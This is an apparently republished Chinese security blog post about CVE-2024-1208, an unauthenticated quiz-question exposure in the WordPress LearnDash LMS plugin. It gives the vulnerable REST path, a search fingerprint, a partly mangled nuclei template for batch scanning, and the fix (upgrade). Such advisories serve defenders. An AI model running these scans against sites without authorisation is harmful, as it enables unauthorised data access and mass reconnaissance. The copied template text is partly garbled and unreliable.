免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
02
—
漏洞影响
WordPress Plugin LearnDash LMS <= 4.10.2
03
—
漏洞描述
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。
WordPress Plugin LearnDash LMS 4.10.2及之前版本存在安全漏洞,该漏洞源于容易通过API暴露敏感信息,未经身份验证的攻击者可以访问测验问题。
04
—
"/wp-content/plugins/sfwd-lms"
05
—
漏洞复现
漏洞路径如下
/wp-json/wp/v2/sfwd-question
使用浏览器访问
漏洞复现成功
06
—
批量漏洞扫描 poc
nuclei 已发布poc,文件内容如下
id: CVE-2024-1208
info:
name: LearnDash LMS < 4.10.3 - Sensitive Information Exposure
author: ritikchaddha
severity: medium
description: |
The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.
remediation: Fixed in 4.10.3
reference:
https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210
https://nvd.nist.gov/vuln/detail/CVE-2024-1208
https://www.wordfence.com/threat-intel/vulnerabilities/id/ae735117-e68b-448e-ad41-258d1be3aebc?source=cve
https://github.com/nomi-sec/PoC-in-GitHub
https://github.com/fkie-cad/nvd-json-data-feeds
classification:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N :
5.3 :
CVE-2024-1208 :
0.01024 :
0.83462 :
cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
1 :
vendor: learndash
product: learndash
framework: wordpress
"/wp-content/plugins/sfwd-lms" :
inurl:"/wp-content/plugins/sfwd-lms" :
tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash
http:
method: GET
path:
"{{BaseURL}}/wp-json/wp/v2/sfwd-question"
and :
matchers:
type: word
part: body
words:
'"id":'
'"question_type":'
'"points_total":'
condition: and
type: word
part: header
words:
'application/json'
type: status
status:
200
# digest: 490a0046304402203916aaf1a8ee1aac0dd4cf38919e9f2e19085f8ccbbed45a47c932c1b491fb1302207bed484d250b4815723b4f03051d6f9f02504d362be0b2f60b4c99d8e8ff2ed3:922c64590222798bb761d5b6d8e72950
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):CVE-2024-1208
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论